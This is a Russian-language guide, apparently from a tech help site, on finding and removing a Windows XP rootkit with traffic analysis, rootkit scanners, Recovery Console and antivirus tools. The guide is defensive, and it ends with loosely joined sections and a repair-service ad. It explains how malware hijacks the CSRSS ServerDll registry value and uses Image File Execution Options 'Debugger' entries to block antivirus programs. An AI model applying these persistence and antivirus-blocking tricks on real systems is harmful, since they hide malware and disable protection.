Как правило, после внедрения, вирус должен связаться с хозяином или с заданным
сервером в интернете, признаком чего будут DNS-запросы. Хотя, опять же, в свете
сказанного выше, умный вирус может их замаскировать, кроме того, он может и
обойти брандмауэр. Забегая вперед, скажу, что в данном конкретном случае этого
не произошло, но для надежного анализа сетевой активности весь трафик
зараженной машины лучше пустить через другую, незараженную, где можно быть
уверенным, что правила брандмауэра выполняются, а анализатор трафика (я
пользовался Wireshark"ом) выдает то, что есть на самом деле.
Перезагружаюсь.
Внешне ничего не изменилось, кроме того, что невозможно выйти в интернет,
поскольку я сам отключил такую возможность. Ни в путях автозапуска, ни в
службах, ни в системных каталогах не появилось ничего нового.
Просмотр системного журнала дает только одну наводку - системе не удалось
запустить таинственную службу grande48
. Такой службы у меня быть не
могло, да и по времени это событие совпало с моментом внедрения.
Что еще наводит на мысль об успешном внедрении - так это отсутствие в реестре
записи о службе grande48 и отсутствие второго сообщения в журнале системы об
ошибке запуска службы после перезагрузки. Это, скорее всего, некоторая
недоработка вирусописателей. Хотя и несущественная, ведь большинство
пользователей журнал событий не просматривают, да и на момент возникновения
подозрения на заражение эта запись в журнале уже может и отсутствовать.
Определяем наличие вируса в системе.
1. Наверняка должен быть "левый" трафик. Определить можно с помощью анализаторов протокола. Я использовал Wireshark. Сразу после загрузки первым запускаю его. Все правильно, есть наличие группы DNS-запросов (как потом оказалось - один раз за 5 минут) на определение IP-адресов узлов ysiqiyp.com, irgfqfyu.com, updpqpqr.com и т.п. Вообще-то все ОС Windows любят выходить в сеть, когда надо и не надо, антивирусы могут обновлять свои базы, поэтому определить принадлежность трафика именно вирусу довольно затруднительно. Обычно требуется пропустить трафик через незараженную машину и серьезно проанализировать его содержимое. Но это отдельная тема. В принципе, косвенным признаком ненормальности сетевой активности системы могут быть значительные значения счетчиков трафика провайдера, в условиях простоя системы, счетчики из свойств VPN-соединения и т.п.
2. Попробуем использовать программы для поиска руткитов. Сейчас таких программ уже немало и их несложно найти в сети. Одна из наиболее популярных - Марка Руссиновича, которую можно скачать на странице раздела Windows Sysinternals сайта Microsoft. Инсталляция не требуется. Разархивируем и запускаем. Жмем "Scan". После непродолжительного сканирования видим результаты:
Кстати, даже не вникая в содержания строк, можно сразу заметить,
что имеются очень "свежие" по времени создания/модификации записи или файлы
(колонка "Timestamp")
. Нас в первую очередь должны заинтересовать файлы
с
описанием (колонка "Description"
) - "Hidden from Windows API"
- скрыто
от API-интерфейса Windows. Скрытие файлов, записей в реестре, приложений - это,
естественно, ненормально.
Два файла - grande48.sys
и
Yoy46.sys
- это как раз то, что мы
ищем. Это и есть
прописавшийся под видом драйверов искомый руткит или его часть, обеспечивающая
скрытность. Наличие в списке остальных было для меня сюрпризом. Проверка показала -
это
нормальные драйверы Windows XP. Кроме того, вирус скрывал их
наличие только в папке \system32
, а их копии
в \system32\dllcache
остались
видимыми.
Напомню, что в Windows XP применяется специальный механизм защиты системных
файлов, называемый Windows File Protection (WFP)
. Задача WFP - автоматическое
восстановление важных системных файлов при их удалении или замене устаревшими
или неподписанными копиями. Все системные файлы Windows XP имеют цифровую
подпись и перечислены в специальной базе данных, используемой WFP. Для хранения
копий файлов используется папка \system32\dllcache
и, отчасти, \Windows\driver cache
. При удалении
или замене одного из системных файлов, WFP автоматически копирует "правильную"
его копию из папки \dllcache. Если указанный файл отсутствует в папке \dllcache ,
то Windows XP просит вставить в привод компакт-дисков установочный компакт-диск Windows XP.
Попробуйте удалить vga.sys из \system32, и система тут же его восстановит,
используя копию из dllcache. А ситуация, когда, при работающей системе
восстановления файлов, файл драйвера есть в \dllcache и его не видно в
\system32 - это тоже дополнительный признак наличия руткита в системе.
Удаляем вирус из системы.
Осталось выполнить самое важное действие - удалить вирус. Самый простой и надежный способ - загрузиться в другой, незараженной операционной системе и запретить старт драйверов руткита.
Воспользуемся стандартной консолью восстановления Windows. Берем установочный диск Windows XP и загружаемся с него. На первом экране выбираем 2-й пункт меню - жмем R.
Выбираем систему (если их несколько):
Вводим пароль администратора.
Список драйверов и служб можно просмотреть с помощью команды listsvc:
В самом деле, в списке присутствует Yoy46 , правда отсутствует grande48, что говорит о том, что файл драйвера grande48.sys скрытно присутствует в системе, но не загружается:
Консоль восстановления позволяет запрещать или разрешать запуск драйверов и служб с помощью команд disable и enable . Запрещаем старт Yoy46 командой:
Водим команду EXIT и система уходит на перезагрузку.
После перезагрузки драйвер руткита не будет загружен, что позволит легко удалить его
файлы и очистить реестр от его записей.
Можно проделать это вручную, а можно
использовать какой-нибудь антивирус. Наиболее эффективным, с моей точки зрения,
будет бесплатный сканер на основе всем известного антивируса Dr.Web Игоря
Данилова. Скачать можно отсюда -
http://freedrweb.ru
Там же можно скачать "Dr.Web LiveCD" - образ диска, который позволяет
восстановить работоспособность системы, пораженной действиями вирусов,
на рабочих станциях и серверах под управлением Windows\Unix, скопировать
важную информацию на сменные носители либо другой компьютер, если действия
вредоносных программ сделали невозможным загрузку компьютера.
Dr.Web LiveCD поможет не только очистить компьютер от инфицированных и
подозрительных файлов, но и попытается вылечить зараженные объекты.
Для удаления вируса нужно скачать с сайта DrWeb образ (файл с расширением.iso)
и записать его на CD. Будет создан загрузочный диск, загрузившись с которого,
руководствуетесь простым и понятным меню.
Если по каким-либо причинам, нет возможности воспользоваться Dr.Web LiveCD,
можно попробовать антивирусный сканер Dr.Web CureIt!, который можно запустить,
загрузившись в другой ОС, например, с использованием
Winternals ERD Commander. Для сканирования зараженной системы необходимо
указать именно ее жесткий диск (Режим "Выборочная проверка").
Сканер поможет вам найти файлы вируса, и вам останется лишь
удалить связанные с ним записи из реестра.
Поскольку вирусы научились прописываться на запуск в безопасном режиме
загрузки, не мешает проверить ветку реестра:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\SafeBoot
Разделы:
Minimal
- список драйверов и служб запускаемых в безопасном режиме
(Safe Mode)
Network
- то же, но с поддержкой сети.
Добавлю, что существует новый класс rootkit, представителем которого является BackDoor.MaosBoot , появившийся в конце 2007г. Эта троянская программа прописывает себя в загрузочный сектор жесткого диска и обеспечивает скрытую установку своего драйвера в памяти. Сам Rootkit-драйвер напрямую записан в последние секторы физического диска, минуя файловую систему, чем и скрывает свое присутствие на диске. В общем-то, принцип не новый, лет десять назад вредоносные программы подобным образом маскировались на резервных дорожках дискет и жестких дисков, однако оказался очень эффективным, поскольку большинство антивирусов с задачей удаления BackDoor.MaosBoot до сих пор не справляются. Упоминаемый выше загрузочный сектор не проверяет, а секторы в конце диска для него никак не связаны с файловой системой и, естественно, такой руткит он не обнаружит. Правда, Dr.Web (а, следовательно, и Cureit) с BackDoor.MaosBoot вполне справляется.
Если у вас возникли сомнения относительно какого-либо файла, то можно
воспользоваться бесплатной онлайновой антивирусной службой
virustotal.com .
Через специальную форму на главной странице сайта закачиваете подозрительный
файл и ждете результатов. Сервисом virustotal используются консольные версии
множества антивирусов для проверки вашего подозреваемого файла.
Результаты выводятся на экран. Если файл является вредоносным, то с большой
долей вероятности, вы сможете это определить. В какой-то степени сервис
можно использовать для выбора "лучшего антивируса".
ссылка на одну из веток форума сайта virusinfo.info, где пользователи выкладывают
ссылки на различные ресурсы посвященные антивирусной защите, в т.ч. и онлайн - проверок
компьютера, браузера, файлов...
Иногда, в результате некорректных действий вируса (или антивируса) система вообще перестает загружаться. Приведу характерный пример. Вредоносные программы пытаются внедриться в систему, используя различные, в том числе, довольно необычные способы. В процессе начальной загрузки, еще до регистрации пользователя, запускается "Диспетчер сеансов" (\SystemRoot\System32\smss.exe) , задача которого - запустить высокоуровневые подсистемы и сервисы (службы) операционной системы. На этом этапе запускаются процессы CSRSS (Client Server Runtime Process), WINLOGON (Windows Logon), LSASS (LSA shell), и оставшиеся службы с параметром Start=2 из раздела реестра
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services
Информация, предназначенная для диспетчера сеансов, находится в ключе реестра
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager
Одним из способов внедрения в систему, является подмена dll-файла для CSRSS. Если вы посмотрите содержимое записи
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager\SubSystems
То найдете значения
ServerDll=basesrv , ServerDll=winsrv . Библиотеки basesrv.dll и winsrv.dll - это "правильные" файлы системы, загружаемые службой CSRSS на обычной (незараженной) системе. Эту запись в реестре можно подправить на запись, обеспечивающую загрузку, например, вместо basesrv.dll, вредоносной basepvllk32.dll:
ServerDll=basepvllk32 (или какую либо другую dll, отличную от basesrv и winsrv)
Что обеспечит, при следующей перезагрузке, получение управления вредоносной программе. Если же ваш антивирус обнаружит и удалит внедренную basepvllk32, оставив нетронутой запись в реестре, то загрузка системы завершится "синим экраном смерти" (BSOD) с ошибкой STOP c000135 и сообщением о невозможности загрузить basepvllk32.
Поправить ситуацию можно так:
Загрузится в консоль восстановления (или в любой другой системе), и
скопировать файл basesrv.dll из папки C:\WINDOWS\system32 в ту же папку
под именем basepvllk32.dll. После чего система загрузится и можно будет
вручную подправить запись в реестре.
- загрузиться с использованием Winternals ERD Commander и исправить запись в
реестре на ServerDll=basesrv
. Или выполнить откат системы с
использованием точки восстановления.
Еще один характерный пример. Вредоносная программ регистрируется
как отладчик процесса explorer.exe, создавая в реестре запись типа:
"Debugger"="C:\Program Files\Microsoft Common\wuauclt.exe"
Удаление wuauclt.exe антивирусом без удаления записи в реестре приводит к
невозможности запуска explorer.exe. В результате вы получаете пустой рабочий
стол, без каких-либо кнопок и ярлыков. Выйти из положения можно используя комбинацию
клавиш CTRL-ALT-DEL. Выбираете "Диспетчер задач" - "Новая задача" - "Обзор" - находите
и запускаете редактор реестра regedit.exe. Затем удаляете ключ
HKM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
и перезагружаетесь.
В случае, когда вы точно знаете время заражения системы, откат на точку восстановления до этого события, является довольно надежным способом избавления от заразы. Иногда есть смысл выполнять не полный откат, а частичный, с восстановлением файла реестра SYSTEM, как это описано в статье "Проблемы с загрузкой ОС" раздела "Windows"
== Май 2008. ==
Дополнение
Это дополнение возникло через год после написания основной статьи. Здесь я решил разместить наиболее интересные решения, возникшие в процессе борьбы с вредоносным программным обеспечением. Что-то вроде коротких заметок.
После удаления вируса ни один антивирус не работает.
Случай интересен тем, что способ блокировки антивирусного программного обеспечения можно использовать и в борьбе с исполняемыми файлами вирусов. Началось все с того, что после удаления довольно примитивного вируса не заработал лицензионный "Стрим Антивирус". Переустановки с чисткой реестра не помогли. Попытка установки Avira Antivir Personal Free закончилась успешно, но сам антивирус не запустился. В системном журнале было сообщение о таймауте при запуске службы "Avira Antivir Guard". Перезапуск вручную заканчивался той же ошибкой. Причем, никаких лишних процессов в системе не выполнялось. Была стопроцентная уверенность - вирусов, руткитов и прочей гадости (Malware) в системе нет.
В какой-то момент попробовал запустить антивирусную утилиту AVZ . Принцип работы AVZ во многом основан на поиске в изучаемой системе разнообразных аномалий. С одной стороны, это помогает в поиске Malware, но с другой вполне закономерны подозрения к компонентам антивирусов, антишпионов и прочего легитимного ПО, активно взаимодействующего с системой. Для подавления реагирования AVZ на легитимные объекты и упрощения
анализа результатов проверки системы за счет отметки легитимных объектов
цветом и их фильтрации из логов, применяется база безопасных файлов AVZ. С недавнего времени запущен полностью автоматический сервис, позволяющий всем желающим прислать файлы для пополнения этой базы.
Но: исполняемый файл avz.exe не запустился! Переименовываю avz.exe в musor.exe - все прекрасно запускается. В очередной раз AVZ оказался незаменимым помощником в решении проблемы. При выполнении проверок в результатах появилась строки:
Опасно - отладчик процесса "avz.exe"="ntsd-d"
Опасно - отладчик процесса "avguard.exe"="ntsd-d"
:.
Это была уже серьезная зацепка. Поиск в реестре по контексту "avz" привел к обнаружению в ветке
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Раздела с именем avz.exe
, содержащем строковый параметр с именем
"Debugger"
и значением .
И, как выяснилось позже, в указанной ветке присутствовал не только раздел
"avz.exe", но и разделы с именами исполняемых модулей практически всех
известных антивирусов и некоторых утилит мониторинга системы. Сам ntsd.exe -
вполне легальный отладчик Windows, стандартно присутствующий во всех версиях
ОС, но подобная запись в реестре приводит к невозможности запуска приложения,
имя исполняемого файла которого совпадает с именем раздела???.exe.
После удаления из реестра всех разделов, c именем???.exe и содержащих запись "Debugger" = "ntsd -d" работоспособность системы полностью восстановилась.
В результате анализа ситуации с использованием параметра "ntsd -d" для блокировки запуска исполняемых файлов, появилась мысль использовать этот же прием для борьбы с самими вирусами. Конечно, это не панацея, но в какой-то степени может снизить угрозу заражения компьютера вирусами с известными именами исполняемых файлов. Для того, чтобы в системе невозможно было выполнить файлы с именами ntos.exe, file.exe, system32.exe и т.п. можно создать reg-файл для импорта в реестр:
Windows Registry Editor Version 5.00
"Debugger"="ntsd -d"
"Debugger"="ntsd -d"
"Debugger"="ntsd -d"
:.. и т.д.
Обратите внимание, на то, что имя раздела не содержат пути файла, поэтому данный способ нельзя применять для файлов вирусов, имена которых совпадают с именами легальных исполняемых файлов, но сами файлы нестандартно размещены в файловой системе. Например, проводник Explorer.exe находится в папке \WINDOWS\, а вирус располагается где-то в другом месте - в корне диска, в папке \temp, \windows\system32\ Если вы создадите раздел с именем "Explorer.exe" - то после входа в систему вы получите пустой рабочий стол, поскольку проводник не запустится. Хуже того, если вы создадите раздел, имя которого совпадает с именем системной службы (winlogon.exe, csrss.exe, smss.exe, services.exe, lsass.exe), то получите рухнувшую систему. Если вирус находится в C:\temp\winlogon.exe, а легальный модуль входа в систему C:\WINDOWS\SYSTEM32\winlogon.exe, создание раздела с именем winlogon.exe приведет к невозможности запуска службы winlogon и краху системы с синим экраном смерти (BSOD).
Но, все же, надеяться на то, что запрашиваемый вирусом код, подойдет в каждом конкретном случае, не стоит. Как не стоит надеяться на честное самоуничтожение вируса, и тем более, не стоит отправлять СМС. Любой вирус можно удалить, даже если он не обнаруживается антивирусами. Методики удаления вируса-вымогателя ничем не отличаются от методик удаления любого другого вредоносного ПО, с одним, пожалуй, отличием - не стоит тратить время на попытки справиться с дрянью в среде зараженной системы, разве что для развития собственных навыков и пополнения знаний.
Наиболее простой и эффективный путь - загрузиться с использованием другой, незараженной системы и, подключившись к зараженной, удалить файлы вируса и исправить внесенные им записи в реестре. Об этом я уже писал выше, в основной части статьи, а здесь попытаюсь просто изложить несколько кратких вариантов удаления вируса.
Использование Dr.Web LiveCD - самый простой и не требующий специальных знаний способ. Скачиваете iso-образ CD, записываете его на болванку, загружаетесь с CD-ROM и запускаете сканер.
Использование Winternals ERD Commander. Загружаетесь с него, подключившись к зараженной системе, и выполняете откат на контрольную точку восстановления с датой, когда заражения еще не было. Выбираете меню System Tools - System Restore
. Если откат средствами ERD Commander"а выполнить невозможно, попробуйте вручную найти файлы реестра в данных контрольных точек и восстановить их в каталог Windows. Как это сделать я подробно описал в статье "Работа с реестром".
Загрузка в другой ОС и ручное удаление вируса. Самый сложный, но самый эффективный способ. В качестве другой ОС удобнее всего использовать тот же ERD Commander. Методика обнаружения и удаления вируса может быть следующей:
Переходите на диск зараженной системы и просматриваете системные каталоги на наличие исполняемых файлов и файлов драйверов с датой создания близкой к дате заражения. Перемещаете эти файлы в отдельную папку. Обратите внимание на каталоги
\Windows
\Windows\system32
\Windows\system32\drivers
\Windows\Tasks\
\RECYCLER
\System Volume Information
Каталоги пользователей \Documents And Settings\All Users
и
\Documents And Settings\имя пользователя
Очень удобно использовать для поиска таких файлов FAR Manager, с включенной сортировкой по дате для панели, где отображается содержимое каталога (комбинация CTRL-F5). Особое внимание стоит обратить на скрытые исполняемые файлы. Существует также эффективная и простая утилита от Nirsoft - SearchMyFiles, применение которой позволяет, в подавляющем большинстве случаев, легко обнаружить вредоносные файлы даже без использования антивируса. Способ обнаружения вредоносных файлов по времени создания (Creation time)
Подключаетесь к реестру зараженной системы и ищете в нем ссылки на имена этих файлов. Сам реестр не мешает предварительно скопировать (полностью или, по крайней мере, те части, где встречаются выше указанные ссылки). Сами ссылки удаляете или изменяете в них имена файлов на другие, например - file.exe на file.ex_, server.dll на server.dl_, driver.sys на driver.sy_.
Данный способ не требует особых знаний и в случаях, когда вирус не меняет дату модификации своих файлов (а это пока встречается очень редко) - дает положительный эффект. Даже если вирус не обнаруживается антивирусами.
Если предыдущие методики не дали результата, остается одно - ручной поиск возможных вариантов запуска вируса. В меню Administrative Tools ERD Commander"а имеются пункты:
Autoruns
- информация о параметрах запуска приложений и оболочке пользователя.
Service and Driver Manager
- информация о службах и драйверах системы.
Вирус и реестр!
Как-то, года три - четыре назад Евгений Касперский сделал такой прогноз, поскольку активность компьютерного преступного мира растет, то в «ближайшем будущем ходить по интернету будет так же опасно, как по тёмным улицам ночью». Медленно, но верно такое время наступает.
Вирусами называют специальные вредоносные программы. Попав на компьютер, в большинстве случаев вирус прописывается в реестре и производит следующие действия: вызывает выключение компьютера, его перезагрузку; тормозит работу операционной системы; портит файлы; производит рассылку по Интернету, что приводит к расходу трафика; и ещё многое другое, ибо нет предела совершенству.
* Запустите HijackThis. Нажмите на кнопку "Do a system scan and save a logfile". Обязательно нужно запускать данные программы с правами администратора.
Для оптимизации и лечения реестра сейчас нет дефицита программ, выбирать можно разные, тестировать, чистить, дефрагментировать. Многие утилиты имеют несколько функций для помощи реестру. У многих утилит очень хороший интерфейс и есть возможности настройки, можно производить запуск по времени, при загрузке компьютера. Вот проверенные временем утилиты: AusLogics Registry Defrag, AusLogics BoostSpeed, Register_DivX, Reg docins, Trash Reg, OneButton Checkup.
При работе с реестром надо быть очень внимательным и делать только то, что понятно, а лучше пригласить специалиста. Он и установит и покажет, как следить за реестром.
Операционная система Windows, стоящая на большинстве компьютеров, достаточно уязвима к вирусному заражению. Если ОС регулярно не обновляется, угроза заражения становится очень большой, так как под любую найденную уязвимость тут же создаются эксплоиты – программные коды, позволяющие заражать операционную систему. То же самое касается другого установленного на компьютере софта – браузеров, проигрывателей и т.д. Любая уязвимость может привести к тому, что ПК будет заражен.
Нередко вредоносные программы попадают на компьютер с зараженными файлами. Многие передаются через флешки, карты памяти, другие носители информации. Чтобы уменьшить вероятность заражения, следует регулярно обновлять ОС, иметь на компьютере хорошую антивирусную систему, не использовать непроверенные файлы.
Как удалить вирус с компьютера
Далеко не всегда деструктивный софт может быть замечен антивирусной программой, нередко его приходится удалять вручную. Если вы видите признаки заражения, откройте «Диспетчер задач», посмотрите список процессов. Опытный пользователь обычно знает, какие процессы запущены в системе, появление незнакомых строчек может свидетельствовать о заражении. Найдя незнакомый процесс, введите его название в поисковике. Это может оказаться легальный процесс какого-то приложения, процесс вредоносного ПО или о нем не будет никакой информации. В последнем случае речь тоже почти наверняка идет о хакерской программе.
Остановите незнакомый процесс, предварительно записав его название. После этого следует удалить файлы вредоносной программы и ключи ее запуска. Откройте «Пуск» - «Поиск», введите название вирусной программы и проведите поиск в системных папках. Все найденные файлы удалите (их может быть несколько).
Следующий шаг - удаление вирусов с компьютера через редактор реестра. Необходимо найти и удалить ключи запуска, которые хакерская программа прописала в системном реестре. Запустите редактор, для этого откройте командную строку, введите команду regedit. Откроется окно программы, нажмите «Правка» - «Найти». Введите название деструктивного процесса, нажмите «Найти далее». Начнется поиск – удалите найденные параметры, затем снова нажмите «Найти далее». Когда поиск будет закончен и все ключи удалены, сохраните изменения и перезагрузите систему. Проверьте, появился ли процесс вируса в «Диспетчере задач». Если нет, вы справились с задачей. Если процесс появился снова, значит, ОС еще содержит файлы вируса и ключи запуска.
Профессиональное удаление вирусов
Далеко не каждый пользователь может самостоятельно справиться с заразившими компьютер вирусами. Многие из них написаны профессионалами, поэтому удалить их может только опытный мастер. Нередко приходится использовать специальный софт, позволяющий контролировать запись в системный реестр – только так удается выяснить, куда записываются ключи автозапуска. Все это требует больших знаний.
Если ваш компьютер заражен и вы не можете сами справиться с проблемой, позвоните нам. Эксперт нашей компании приедет к вам на дом и быстро очистит ваш ПК от вирусов. Опыт наших специалистов позволяет им справляться даже с самыми серьезными случаями. Звоните нам в любое время, вы останетесь довольны качеством наших услуг!
